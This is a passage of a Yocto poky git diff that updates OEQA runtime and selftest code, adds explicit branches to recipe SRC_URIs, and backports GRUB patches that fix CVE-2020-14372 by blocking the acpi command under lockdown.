output = self.target.run(cmd) diff --git a/poky/meta/lib/oeqa/runtime/cases/parselogs.py b/poky/meta/lib/oeqa/runtime/cases/parselogs.py index f703927660..1cac59725d 100644 --- a/poky/meta/lib/oeqa/runtime/cases/parselogs.py +++ b/poky/meta/lib/oeqa/runtime/cases/parselogs.py @@ -32,7 +32,7 @@ common_errors = [ "Failed to load module \"fbdev\"", "Failed to load module fbdev", "Failed to load module glx", - "[drm] Cannot find any crtc or sizes - going 1024x768", + "[drm] Cannot find any crtc or sizes", "_OSC failed (AE_NOT_FOUND); disabling ASPM", "Open ACPI failed (/var/run/acpid.socket) (No such file or directory)", "NX (Execute Disable) protection cannot be enabled: non-PAE kernel!", @@ -61,6 +61,8 @@ common_errors = [ "[rdrand]: Initialization Failed", "[pulseaudio] authkey.c: Failed to open cookie file", "[pulseaudio] authkey.c: Failed to load authentication key", + "was skipped because of a failed condition check", + "was skipped because all trigger condition checks failed", ] video_related = [ @@ -90,6 +92,7 @@ qemux86_common = [ "glamor initialization failed", "blk_update_request: I/O error, dev fd0, sector 0 op 0x0:(READ)", "floppy: error", + 'failed to IDENTIFY (I/O error, err_mask=0x4)', ] + common_errors ignore_errors = { @@ -295,7 +298,7 @@ class ParseLogsTest(OERuntimeTestCase): grepcmd = 'grep ' grepcmd += '-Ei "' for error in errors: - grepcmd += '\<' + error + '\>' + '|' + grepcmd += r'\<' + error + r'\>' + '|' grepcmd = grepcmd[:-1] grepcmd += '" ' + str(log) + " | grep -Eiv \'" @@ -306,13 +309,13 @@ class ParseLogsTest(OERuntimeTestCase): errorlist = ignore_errors['default'] for ignore_error in errorlist: - ignore_error = ignore_error.replace('(', '\(') - ignore_error = ignore_error.replace(')', '\)') + ignore_error = ignore_error.replace('(', r'\(') + ignore_error = ignore_error.replace(')', r'\)') ignore_error = ignore_error.replace("'", '.') - ignore_error = ignore_error.replace('?', '\?') - ignore_error = ignore_error.replace('[', '\[') - ignore_error = ignore_error.replace(']', '\]') - ignore_error = ignore_error.replace('*', '\*') + ignore_error = ignore_error.replace('?', r'\?') + ignore_error = ignore_error.replace('[', r'\[') + ignore_error = ignore_error.replace(']', r'\]') + ignore_error = ignore_error.replace('*', r'\*') ignore_error = ignore_error.replace('0-9', '[0-9]') grepcmd += ignore_error + '|' grepcmd = grepcmd[:-1] diff --git a/poky/meta/lib/oeqa/runtime/context.py b/poky/meta/lib/oeqa/runtime/context.py index 3826f27642..d707ab263a 100644 --- a/poky/meta/lib/oeqa/runtime/context.py +++ b/poky/meta/lib/oeqa/runtime/context.py @@ -5,6 +5,7 @@ # import os +import sys from oeqa.core.context import OETestContext, OETestContextExecutor from oeqa.core.target.ssh import OESSHTarget @@ -119,8 +120,7 @@ class OERuntimeTestContextExecutor(OETestContextExecutor): # XXX: Don't base your targets on this code it will be refactored # in the near future. # Custom target module loading - target_modules_path = kwargs.get('target_modules_path', '') - controller = OERuntimeTestContextExecutor.getControllerModule(target_type, target_modules_path) + controller = OERuntimeTestContextExecutor.getControllerModule(target_type) target = controller(logger, target_ip, server_ip, **kwargs) return target @@ -130,15 +130,15 @@ class OERuntimeTestContextExecutor(OETestContextExecutor): # AttributeError raised if not found. # ImportError raised if a provided module can not be imported. @staticmethod - def getControllerModule(target, target_modules_path): - controllerslist = OERuntimeTestContextExecutor._getControllerModulenames(target_modules_path) + def getControllerModule(target): + controllerslist = OERuntimeTestContextExecutor._getControllerModulenames() controller = OERuntimeTestContextExecutor._loadControllerFromName(target, controllerslist) return controller # Return a list of all python modules in lib/oeqa/controllers for each # layer in bbpath @staticmethod - def _getControllerModulenames(target_modules_path): + def _getControllerModulenames(): controllerslist = [] @@ -153,9 +153,8 @@ class OERuntimeTestContextExecutor(OETestContextExecutor): else: raise RuntimeError("Duplicate controller module found for %s. Layers should create unique controller module names" % module) - extpath = target_modules_path.split(':') - for p in extpath: - controllerpath = os.path.join(p, 'lib', 'oeqa', 'controllers') + for p in sys.path: + controllerpath = os.path.join(p, 'oeqa', 'controllers') if os.path.exists(controllerpath): add_controller_list(controllerpath) return controllerslist @@ -175,16 +174,12 @@ class OERuntimeTestContextExecutor(OETestContextExecutor): # Search for and return a controller or None from given module name @staticmethod def _loadControllerFromModule(target, modulename): - obj = None - # import module, allowing it to raise import exception - module = __import__(modulename, globals(), locals(), [target]) - # look for target class in the module, catching any exceptions as it - # is valid that a module may not have the target class. try: - obj = getattr(module, target) - except: - obj = None - return obj + import importlib + module = importlib.import_module(modulename) + return getattr(module, target) + except AttributeError: + return None @staticmethod def readPackagesManifest(manifest): diff --git a/poky/meta/lib/oeqa/selftest/cases/bbtests.py b/poky/meta/lib/oeqa/selftest/cases/bbtests.py index dc423ec439..e659be5341 100644 --- a/poky/meta/lib/oeqa/selftest/cases/bbtests.py +++ b/poky/meta/lib/oeqa/selftest/cases/bbtests.py @@ -148,9 +148,6 @@ INHERIT_remove = \"report-error\" self.delete_recipeinc('man-db') self.assertEqual(result.status, 1, msg="Command succeded when it should have failed. bitbake output: %s" % result.output) self.assertIn('Fetcher failure: Unable to find file file://invalid anywhere. The paths that were searched were:', result.output) - line = self.getline(result, 'Fetcher failure for URL: \'file://invalid\'. Unable to fetch URL from any source.') - self.assertTrue(line and line.startswith("ERROR:"), msg = "\"invalid\" file \ -doesn't exist, yet fetcher didn't report any error. bitbake output: %s" % result.output) def test_rename_downloaded_file(self): # TODO unique dldir instead of using cleanall @@ -160,7 +157,7 @@ SSTATE_DIR = \"${TOPDIR}/download-selftest\" """) self.track_for_cleanup(os.path.join(self.builddir, "download-selftest")) - data = 'SRC_URI = "${GNU_MIRROR}/aspell/aspell-${PV}.tar.gz;downloadfilename=test-aspell.tar.gz"' + data = 'SRC_URI = "https://downloads.yoctoproject.org/mirror/sources/aspell-${PV}.tar.gz;downloadfilename=test-aspell.tar.gz"' self.write_recipeinc('aspell', data) result = bitbake('-f -c fetch aspell', ignore_status=True) self.delete_recipeinc('aspell') diff --git a/poky/meta/lib/oeqa/selftest/cases/devtool.py b/poky/meta/lib/oeqa/selftest/cases/devtool.py index 0985434238..87e71632ab 100644 --- a/poky/meta/lib/oeqa/selftest/cases/devtool.py +++ b/poky/meta/lib/oeqa/selftest/cases/devtool.py @@ -340,7 +340,7 @@ class DevtoolAddTests(DevtoolBase): checkvars['LIC_FILES_CHKSUM'] = 'file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263' checkvars['S'] = '${WORKDIR}/git' checkvars['PV'] = '0.1+git${SRCPV}' - checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/dbus-wait;protocol=https' + checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/dbus-wait;protocol=https;branch=master' checkvars['SRCREV'] = srcrev checkvars['DEPENDS'] = set(['dbus']) self._test_recipe_contents(recipefile, checkvars, []) @@ -442,6 +442,7 @@ class DevtoolAddTests(DevtoolBase): tempdir = tempfile.mkdtemp(prefix='devtoolqa') self.track_for_cleanup(tempdir) url = 'gitsm://git.yoctoproject.org/mraa' + url_branch = '%s;branch=master' % url checkrev = 'ae127b19a50aa54255e4330ccfdd9a5d058e581d' testrecipe = 'mraa' srcdir = os.path.join(tempdir, testrecipe) @@ -462,7 +463,7 @@ class DevtoolAddTests(DevtoolBase): checkvars = {} checkvars['S'] = '${WORKDIR}/git' checkvars['PV'] = '1.0+git${SRCPV}' - checkvars['SRC_URI'] = url + checkvars['SRC_URI'] = url_branch checkvars['SRCREV'] = '${AUTOREV}' self._test_recipe_contents(recipefile, checkvars, []) # Try with revision and version specified @@ -481,7 +482,7 @@ class DevtoolAddTests(DevtoolBase): checkvars = {} checkvars['S'] = '${WORKDIR}/git' checkvars['PV'] = '1.5+git${SRCPV}' - checkvars['SRC_URI'] = url + checkvars['SRC_URI'] = url_branch checkvars['SRCREV'] = checkrev self._test_recipe_contents(recipefile, checkvars, []) @@ -880,7 +881,7 @@ class DevtoolUpdateTests(DevtoolBase): self._check_repo_status(os.path.dirname(recipefile), expected_status) result = runCmd('git diff %s' % os.path.basename(recipefile), cwd=os.path.dirname(recipefile)) - addlines = ['SRCREV = ".*"', 'SRC_URI = "git://git.infradead.org/mtd-utils.git"'] + addlines = ['SRCREV = ".*"', 'SRC_URI = "git://git.infradead.org/mtd-utils.git;branch=master"'] srcurilines = src_uri.split() srcurilines[0] = 'SRC_URI = "' + srcurilines[0] srcurilines.append('"') diff --git a/poky/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt b/poky/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt new file mode 100644 index 0000000000..f70f10e4db --- /dev/null +++ b/poky/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt @@ -0,0 +1 @@ +A diff --git a/poky/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt b/poky/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt new file mode 100644 index 0000000000..223b7836fb --- /dev/null +++ b/poky/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt @@ -0,0 +1 @@ +B diff --git a/poky/meta/lib/oeqa/selftest/cases/gotoolchain.py b/poky/meta/lib/oeqa/selftest/cases/gotoolchain.py index 3119520f0d..59f80aad28 100644 --- a/poky/meta/lib/oeqa/selftest/cases/gotoolchain.py +++ b/poky/meta/lib/oeqa/selftest/cases/gotoolchain.py @@ -43,6 +43,12 @@ class oeGoToolchainSelfTest(OESelftestTestCase): @classmethod def tearDownClass(cls): + # Go creates file which are readonly + for dirpath, dirnames, filenames in os.walk(cls.tmpdir_SDKQA): + for filename in filenames + dirnames: + f = os.path.join(dirpath, filename) + if not os.path.islink(f): + os.chmod(f, 0o775) shutil.rmtree(cls.tmpdir_SDKQA, ignore_errors=True) super(oeGoToolchainSelfTest, cls).tearDownClass() diff --git a/poky/meta/lib/oeqa/selftest/cases/imagefeatures.py b/poky/meta/lib/oeqa/selftest/cases/imagefeatures.py index 2b9c4998f7..535d80cb86 100644 --- a/poky/meta/lib/oeqa/selftest/cases/imagefeatures.py +++ b/poky/meta/lib/oeqa/selftest/cases/imagefeatures.py @@ -240,7 +240,7 @@ USERADD_GID_TABLES += "files/static-group" def test_no_busybox_base_utils(self): config = """ # Enable x11 -DISTRO_FEATURES_append += "x11" +DISTRO_FEATURES_append = " x11" # Switch to systemd DISTRO_FEATURES += "systemd" diff --git a/poky/meta/lib/oeqa/selftest/cases/recipetool.py b/poky/meta/lib/oeqa/selftest/cases/recipetool.py index c2ade2543a..e8aeea3023 100644 --- a/poky/meta/lib/oeqa/selftest/cases/recipetool.py +++ b/poky/meta/lib/oeqa/selftest/cases/recipetool.py @@ -370,7 +370,7 @@ class RecipetoolTests(RecipetoolBase): tempsrc = os.path.join(self.tempdir, 'srctree') os.makedirs(tempsrc) recipefile = os.path.join(self.tempdir, 'libmatchbox.bb') - srcuri = 'git://git.yoctoproject.org/libmatchbox' + srcuri = 'git://git.yoctoproject.org/libmatchbox;branch=master' result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri + ";rev=9f7cf8895ae2d39c465c04cc78e918c157420269", '-x', tempsrc]) self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output) checkvars = {} @@ -456,7 +456,7 @@ class RecipetoolTests(RecipetoolBase): self.assertTrue(os.path.isfile(recipefile)) checkvars = {} checkvars['LICENSE'] = set(['Apache-2.0']) - checkvars['SRC_URI'] = 'git://github.com/mesonbuild/meson;protocol=https' + checkvars['SRC_URI'] = 'git://github.com/mesonbuild/meson;protocol=https;branch=master' inherits = ['setuptools3'] self._test_recipe_contents(recipefile, checkvars, inherits) @@ -523,7 +523,7 @@ class RecipetoolTests(RecipetoolBase): self.assertTrue(os.path.isfile(recipefile)) checkvars = {} checkvars['LICENSE'] = set(['GPLv2']) - checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/matchbox-terminal;protocol=http' + checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/matchbox-terminal;protocol=http;branch=master' inherits = ['pkgconfig', 'autotools'] self._test_recipe_contents(recipefile, checkvars, inherits) diff --git a/poky/meta/lib/oeqa/selftest/cases/reproducible.py b/poky/meta/lib/oeqa/selftest/cases/reproducible.py index 0e44ce4dbf..4b606e7e64 100644 --- a/poky/meta/lib/oeqa/selftest/cases/reproducible.py +++ b/poky/meta/lib/oeqa/selftest/cases/reproducible.py @@ -31,7 +31,6 @@ exclude_packages = [ 'bootchart2-doc', 'epiphany', 'gcr', - 'git', 'glide', 'go-dep', 'go-helloworld', @@ -44,7 +43,6 @@ exclude_packages = [ 'libcap-ng', 'libjson', 'libproxy', - 'lsb-release', 'lttng-tools-dbg', 'lttng-tools-ptest', 'ltp', @@ -55,14 +53,12 @@ exclude_packages = [ 'pybootchartgui', 'qemu', 'quilt-ptest', - "rpm", 'rsync', 'ruby', 'stress-ng', 'systemd-bootchart', 'systemtap', 'valgrind-ptest', - 'vim', 'webkitgtk', ] @@ -144,6 +140,32 @@ def compare_file(reference, test, diffutils_sysroot): result.status = SAME return result +def run_diffoscope(a_dir, b_dir, html_dir, **kwargs): + return runCmd(['diffoscope', '--no-default-limits', '--exclude-directory-metadata', 'yes', '--html-dir', html_dir, a_dir, b_dir], + **kwargs) + +class DiffoscopeTests(OESelftestTestCase): + diffoscope_test_files = os.path.join(os.path.dirname(os.path.abspath(__file__)), "diffoscope") + + def test_diffoscope(self): + bitbake("diffoscope-native -c addto_recipe_sysroot") + diffoscope_sysroot = get_bb_var("RECIPE_SYSROOT_NATIVE", "diffoscope-native") + + # Check that diffoscope doesn't return an error when the files compare + # the same (a general check that diffoscope is working) + with tempfile.TemporaryDirectory() as tmpdir: + run_diffoscope('A', 'A', tmpdir, + native_sysroot=diffoscope_sysroot, cwd=self.diffoscope_test_files) + + # Check that diffoscope generates an index.html file when the files are + # different + with tempfile.TemporaryDirectory() as tmpdir: + r = run_diffoscope('A', 'B', tmpdir, + native_sysroot=diffoscope_sysroot, ignore_status=True, cwd=self.diffoscope_test_files) + + self.assertNotEqual(r.status, 0, msg="diffoscope was successful when an error was expected") + self.assertTrue(os.path.exists(os.path.join(tmpdir, 'index.html')), "HTML index not found!") + class ReproducibleTests(OESelftestTestCase): # Test the reproducibility of whatever is built between sstate_targets and targets @@ -321,7 +343,7 @@ class ReproducibleTests(OESelftestTestCase): # Copy jquery to improve the diffoscope output usability self.copy_file(os.path.join(jquery_sysroot, 'usr/share/javascript/jquery/jquery.min.js'), os.path.join(package_html_dir, 'jquery.js')) - runCmd(['diffoscope', '--no-default-limits', '--exclude-directory-metadata', '--html-dir', package_html_dir, 'reproducibleA', 'reproducibleB'], + run_diffoscope('reproducibleA', 'reproducibleB', package_html_dir, native_sysroot=diffoscope_sysroot, ignore_status=True, cwd=package_dir) if fails: diff --git a/poky/meta/lib/oeqa/selftest/cases/runtime_test.py b/poky/meta/lib/oeqa/selftest/cases/runtime_test.py index 353d411681..20dc1c9482 100644 --- a/poky/meta/lib/oeqa/selftest/cases/runtime_test.py +++ b/poky/meta/lib/oeqa/selftest/cases/runtime_test.py @@ -179,6 +179,12 @@ class TestImage(OESelftestTestCase): self.skipTest('virgl isn\'t working with Debian 8') if distro and distro == 'centos-7': self.skipTest('virgl isn\'t working with Centos 7') + if distro and distro == 'centos-8': + self.skipTest('virgl isn\'t working with Centos 8') + if distro and distro == 'fedora-34': + self.skipTest('virgl isn\'t working with Fedora 34') + if distro and distro == 'fedora-35': + self.skipTest('virgl isn\'t working with Fedora 35') if distro and distro == 'opensuseleap-15.0': self.skipTest('virgl isn\'t working with Opensuse 15.0') @@ -216,6 +222,7 @@ class TestImage(OESelftestTestCase): Author: Alexander Kanavin """ import subprocess, os + self.skipTest("Crashes in mesa observed with this test on dunfell: https://bugzilla.yoctoproject.org/show_bug.cgi?id=14527") try: content = os.listdir("/dev/dri") if len([i for i in content if i.startswith('render')]) == 0: diff --git a/poky/meta/lib/oeqa/selftest/cases/sstatetests.py b/poky/meta/lib/oeqa/selftest/cases/sstatetests.py index c46e8ba489..1bfe88c87d 100644 --- a/poky/meta/lib/oeqa/selftest/cases/sstatetests.py +++ b/poky/meta/lib/oeqa/selftest/cases/sstatetests.py @@ -39,7 +39,7 @@ class SStateTests(SStateBase): recipefile = os.path.join(tempdir, "recipes-test", "dbus-wait-test", 'dbus-wait-test_git.bb') os.makedirs(os.path.dirname(recipefile)) - srcuri = 'git://' + srcdir + ';protocol=file' + srcuri = 'git://' + srcdir + ';protocol=file;branch=master' result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri]) self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output) @@ -137,7 +137,7 @@ class SStateTests(SStateBase): filtered_results.append(r) self.assertTrue(filtered_results == [], msg="Found distro non-specific sstate for: %s (%s)" % (', '.join(map(str, targets)), str(filtered_results))) file_tracker_1 = self.search_sstate('|'.join(map(str, [s + r'.*?\.tgz$' for s in targets])), distro_specific=True, distro_nonspecific=False) - self.assertTrue(len(file_tracker_1) >= len(targets), msg = "Not all sstate files ware created for: %s" % ', '.join(map(str, targets))) + self.assertTrue(len(file_tracker_1) >= len(targets), msg = "Not all sstate files were created for: %s" % ', '.join(map(str, targets))) self.track_for_cleanup(self.distro_specific_sstate + "_old") shutil.copytree(self.distro_specific_sstate, self.distro_specific_sstate + "_old") @@ -146,13 +146,13 @@ class SStateTests(SStateBase): bitbake(['-cclean'] + targets) bitbake(targets) file_tracker_2 = self.search_sstate('|'.join(map(str, [s + r'.*?\.tgz$' for s in targets])), distro_specific=True, distro_nonspecific=False) - self.assertTrue(len(file_tracker_2) >= len(targets), msg = "Not all sstate files ware created for: %s" % ', '.join(map(str, targets))) + self.assertTrue(len(file_tracker_2) >= len(targets), msg = "Not all sstate files were created for: %s" % ', '.join(map(str, targets))) not_recreated = [x for x in file_tracker_1 if x not in file_tracker_2] - self.assertTrue(not_recreated == [], msg="The following sstate files ware not recreated: %s" % ', '.join(map(str, not_recreated))) + self.assertTrue(not_recreated == [], msg="The following sstate files were not recreated: %s" % ', '.join(map(str, not_recreated))) created_once = [x for x in file_tracker_2 if x not in file_tracker_1] - self.assertTrue(created_once == [], msg="The following sstate files ware created only in the second run: %s" % ', '.join(map(str, created_once))) + self.assertTrue(created_once == [], msg="The following sstate files were created only in the second run: %s" % ', '.join(map(str, created_once))) def test_rebuild_distro_specific_sstate_cross_native_targets(self): self.run_test_rebuild_distro_specific_sstate(['binutils-cross-' + self.tune_arch, 'binutils-native'], temp_sstate_location=True) @@ -202,9 +202,9 @@ class SStateTests(SStateBase): actual_remaining_sstate = [x for x in self.search_sstate(target + r'.*?\.tgz$') if not any(pattern in x for pattern in ignore_patterns)] actual_not_expected = [x for x in actual_remaining_sstate if x not in expected_remaining_sstate] - self.assertFalse(actual_not_expected, msg="Files should have been removed but ware not: %s" % ', '.join(map(str, actual_not_expected))) + self.assertFalse(actual_not_expected, msg="Files should have been removed but were not: %s" % ', '.join(map(str, actual_not_expected))) expected_not_actual = [x for x in expected_remaining_sstate if x not in actual_remaining_sstate] - self.assertFalse(expected_not_actual, msg="Extra files ware removed: %s" ', '.join(map(str, expected_not_actual))) + self.assertFalse(expected_not_actual, msg="Extra files were removed: %s" ', '.join(map(str, expected_not_actual))) def test_sstate_cache_management_script_using_pr_1(self): global_config = [] diff --git a/poky/meta/lib/oeqa/selftest/cases/tinfoil.py b/poky/meta/lib/oeqa/selftest/cases/tinfoil.py index a51c6048d3..4fcbe594c9 100644 --- a/poky/meta/lib/oeqa/selftest/cases/tinfoil.py +++ b/poky/meta/lib/oeqa/selftest/cases/tinfoil.py @@ -94,16 +94,15 @@ class TinfoilTests(OESelftestTestCase): pass pattern = 'conf' - res = tinfoil.run_command('findFilesMatchingInDir', pattern, 'conf/machine') + res = tinfoil.run_command('testCookerCommandEvent', pattern) self.assertTrue(res) eventreceived = False commandcomplete = False start = time.time() - # Wait for maximum 60s in total so we'd detect spurious heartbeat events for example - # The test is IO load sensitive too + # Wait for maximum 120s in total so we'd detect spurious heartbeat events for example while (not (eventreceived == True and commandcomplete == True) - and (time.time() - start < 60)): + and (time.time() - start < 120)): # if we received both events (on let's say a good day), we are done event = tinfoil.wait_event(1) if event: @@ -111,7 +110,8 @@ class TinfoilTests(OESelftestTestCase): commandcomplete = True elif isinstance(event, bb.event.FilesMatchingFound): self.assertEqual(pattern, event._pattern) - self.assertIn('qemuarm.conf', event._matches) + self.assertIn('A', event._matches) + self.assertIn('B', event._matches) eventreceived = True elif isinstance(event, logging.LogRecord): continue diff --git a/poky/meta/lib/oeqa/utils/buildproject.py b/poky/meta/lib/oeqa/utils/buildproject.py index e6d80cc8dc..dfb9661868 100644 --- a/poky/meta/lib/oeqa/utils/buildproject.py +++ b/poky/meta/lib/oeqa/utils/buildproject.py @@ -18,6 +18,7 @@ class BuildProject(metaclass=ABCMeta): def __init__(self, uri, foldername=None, tmpdir=None, dl_dir=None): self.uri = uri self.archive = os.path.basename(uri) + self.tempdirobj = None if not tmpdir: self.tempdirobj = tempfile.TemporaryDirectory(prefix='buildproject-') tmpdir = self.tempdirobj.name @@ -57,6 +58,8 @@ class BuildProject(metaclass=ABCMeta): return self._run('cd %s; make install %s' % (self.targetdir, install_args)) def clean(self): + if self.tempdirobj: + self.tempdirobj.cleanup() if not self.needclean: return self._run('rm -rf %s' % self.targetdir) diff --git a/poky/meta/lib/oeqa/utils/qemurunner.py b/poky/meta/lib/oeqa/utils/qemurunner.py index 79db2cc247..de0dff3ff0 100644 --- a/poky/meta/lib/oeqa/utils/qemurunner.py +++ b/poky/meta/lib/oeqa/utils/qemurunner.py @@ -120,7 +120,10 @@ class QemuRunner: import fcntl fl = fcntl.fcntl(o, fcntl.F_GETFL) fcntl.fcntl(o, fcntl.F_SETFL, fl | os.O_NONBLOCK) - return os.read(o.fileno(), 1000000).decode("utf-8") + try: + return os.read(o.fileno(), 1000000).decode("utf-8") + except BlockingIOError: + return "" def handleSIGCHLD(self, signum, frame): @@ -231,7 +234,7 @@ class QemuRunner: r = os.fdopen(r) x = r.read() os.killpg(os.getpgid(self.runqemu.pid), signal.SIGTERM) - sys.exit(0) + os._exit(0) self.logger.debug("runqemu started, pid is %s" % self.runqemu.pid) self.logger.debug("waiting at most %s seconds for qemu pid (%s)" % @@ -435,6 +438,8 @@ class QemuRunner: if self.runqemu.poll() is None: self.logger.debug("Sending SIGKILL to runqemu") os.killpg(os.getpgid(self.runqemu.pid), signal.SIGKILL) + if not self.runqemu.stdout.closed: + self.logger.info("Output from runqemu:\n%s" % self.getOutput(self.runqemu.stdout)) self.runqemu.stdin.close() self.runqemu.stdout.close() self.runqemu_exited = True diff --git a/poky/meta/lib/oeqa/utils/targetbuild.py b/poky/meta/lib/oeqa/utils/targetbuild.py index 1055810ca3..09738add1d 100644 --- a/poky/meta/lib/oeqa/utils/targetbuild.py +++ b/poky/meta/lib/oeqa/utils/targetbuild.py @@ -19,6 +19,7 @@ class BuildProject(metaclass=ABCMeta): self.d = d self.uri = uri self.archive = os.path.basename(uri) + self.tempdirobj = None if not tmpdir: tmpdir = self.d.getVar('WORKDIR') if not tmpdir: @@ -71,9 +72,10 @@ class BuildProject(metaclass=ABCMeta): return self._run('cd %s; make install %s' % (self.targetdir, install_args)) def clean(self): + if self.tempdirobj: + self.tempdirobj.cleanup() self._run('rm -rf %s' % self.targetdir) subprocess.check_call('rm -f %s' % self.localarchive, shell=True) - pass class TargetBuildProject(BuildProject): diff --git a/poky/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb b/poky/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb index 5d6f200a73..e9dfa0770e 100644 --- a/poky/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb +++ b/poky/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb @@ -10,7 +10,7 @@ DEPENDS = "efivar popt" COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux" -SRC_URI = "git://github.com/rhinstaller/efibootmgr.git;protocol=https \ +SRC_URI = "git://github.com/rhinstaller/efibootmgr.git;protocol=https;branch=master \ file://0001-remove-extra-decl.patch \ file://97668ae0bce776a36ea2001dea63d376be8274ac.patch \ " diff --git a/poky/meta/recipes-bsp/efivar/efivar_37.bb b/poky/meta/recipes-bsp/efivar/efivar_37.bb index 5bf121ff6e..fa1fe1ecdf 100644 --- a/poky/meta/recipes-bsp/efivar/efivar_37.bb +++ b/poky/meta/recipes-bsp/efivar/efivar_37.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=6626bb1e20189cfa95f2c508ba286393" COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux" -SRC_URI = "git://github.com/rhinstaller/efivar.git \ +SRC_URI = "git://github.com/rhinstaller/efivar.git;branch=master;protocol=https \ file://determinism.patch \ file://no-werror.patch" SRCREV = "c1d6b10e1ed4ba2be07f385eae5bceb694478a10" diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-14372.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372.patch new file mode 100644 index 0000000000..08e7666cde --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372.patch @@ -0,0 +1,76 @@ +From 0d237c0b90f0c6d4a3662c569b2371ae3ed69574 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas +Date: Mon, 28 Sep 2020 20:08:41 +0200 +Subject: [PATCH] acpi: Don't register the acpi command when locked down +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +The command is not allowed when lockdown is enforced. Otherwise an +attacker can instruct the GRUB to load an SSDT table to overwrite +the kernel lockdown configuration and later load and execute +unsigned code. + +Fixes: CVE-2020-14372 + +Reported-by: Máté Kukri +Signed-off-by: Javier Martinez Canillas +Reviewed-by: Daniel Kiper + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=3e8e4c0549240fa209acffceb473e1e509b50c95] +CVE: CVE-2020-14372 +Signed-off-by: Marta Rybczynska +--- + docs/grub.texi | 5 +++++ + grub-core/commands/acpi.c | 15 ++++++++------- + 2 files changed, 13 insertions(+), 7 deletions(-) + +diff --git a/docs/grub.texi b/docs/grub.texi +index 0786427..47ac7ff 100644 +--- a/docs/grub.texi ++++ b/docs/grub.texi +@@ -3986,6 +3986,11 @@ Normally, this command will replace the Root System Description Pointer + (RSDP) in the Extended BIOS Data Area to point to the new tables. If the + @option{--no-ebda} option is used, the new tables will be known only to + GRUB, but may be used by GRUB's EFI emulation. ++ ++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}). ++ Otherwise an attacker can instruct the GRUB to load an SSDT table to ++ overwrite the kernel lockdown configuration and later load and execute ++ unsigned code. + @end deffn + + +diff --git a/grub-core/commands/acpi.c b/grub-core/commands/acpi.c +index 5a1499a..1215f2a 100644 +--- a/grub-core/commands/acpi.c ++++ b/grub-core/commands/acpi.c +@@ -27,6 +27,7 @@ + #include + #include + #include ++#include + + #ifdef GRUB_MACHINE_EFI + #include +@@ -775,13 +776,13 @@ static grub_extcmd_t cmd; + + GRUB_MOD_INIT(acpi) + { +- cmd = grub_register_extcmd ("acpi", grub_cmd_acpi, 0, +- N_("[-1|-2] [--exclude=TABLE1,TABLE2|" +- "--load-only=TABLE1,TABLE2] FILE1" +- " [FILE2] [...]"), +- N_("Load host ACPI tables and tables " +- "specified by arguments."), +- options); ++ cmd = grub_register_extcmd_lockdown ("acpi", grub_cmd_acpi, 0, ++ N_("[-1|-2] [--exclude=TABLE1,TABLE2|" ++ "--load-only=TABLE1,TABLE2] FILE1" ++ " [FILE2] [...]"), ++ N_("Load host ACPI tables and tables " ++ "specified by arguments."), ++ options); + } + + GRUB_MOD_FINI(acpi) diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch new file mode 100644 index 0000000000..745f335501 --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch @@ -0,0 +1,130 @@ +From fe7a13df6200bda934fcc0246458df249f1ef4f2 Mon Sep 17 00:00:00 2001 +From: Marco A Benatto +Date: Wed, 23 Sep 2020 11:33:33 -0400 +Subject: [PATCH] verifiers: Move verifiers API to kernel image + +Move verifiers API from a module to the kernel image, so it can be +used there as well. There are no functional changes in this patch. + +Signed-off-by: Marco A Benatto +Signed-off-by: Javier Martinez Canillas +Reviewed-by: Daniel Kiper + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9e95f45ceeef36fcf93cbfffcf004276883dbc99] +CVE: CVE-2020-14372 +Signed-off-by: Marta Rybczynska +--- + grub-core/Makefile.am | 1 + + grub-core/Makefile.core.def | 6 +----- + grub-core/kern/main.c | 4 ++++ + grub-core/{commands => kern}/verifiers.c | 8 ++------ + include/grub/verify.h | 9 ++++++--- + 5 files changed, 14 insertions(+), 14 deletions(-) + rename grub-core/{commands => kern}/verifiers.c (97%) + +diff --git a/grub-core/Makefile.am b/grub-core/Makefile.am +index 3ea8e7f..375c30d 100644 +--- a/grub-core/Makefile.am ++++ b/grub-core/Makefile.am +@@ -90,6 +90,7 @@ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/parser.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/partition.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/term.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/time.h ++KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/verify.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/mm_private.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/net.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/memory.h +diff --git 